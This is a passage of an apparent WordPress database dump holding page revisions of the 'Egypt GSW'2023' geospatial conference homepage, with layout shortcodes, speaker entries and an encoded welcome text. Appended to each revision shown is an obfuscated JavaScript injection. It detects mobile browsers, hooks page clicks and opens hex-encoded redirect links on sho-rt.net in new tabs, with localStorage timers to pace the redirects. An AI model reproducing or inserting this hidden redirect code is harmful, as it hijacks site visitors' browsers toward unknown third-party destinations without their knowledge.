|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:27:56','2022-10-06 19:27:56','',2167,'https://gsw2023.com/?p=2320',0,'revision','',0),
(2321,1,'2022-10-06 19:42:28','2022-10-06 19:42:28','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665116627203{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]More Information[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1529519814966{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #8426B0), color-stop(54%, #BD0282), color-stop(95%, #EC4B3C));background: -moz-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -webkit-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -o-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: -ms-linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);background: linear-gradient(left,#8426B0 10%,#BD0282 54%,#EC4B3C 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_team_masonry][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-06 19:42:28','2022-10-06 19:42:28','',2167,'https://gsw2023.com/?p=2321',0,'revision','',0),
(2322,1,'2022-10-06 19:43:04','2022-10-06 19:43:04','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" 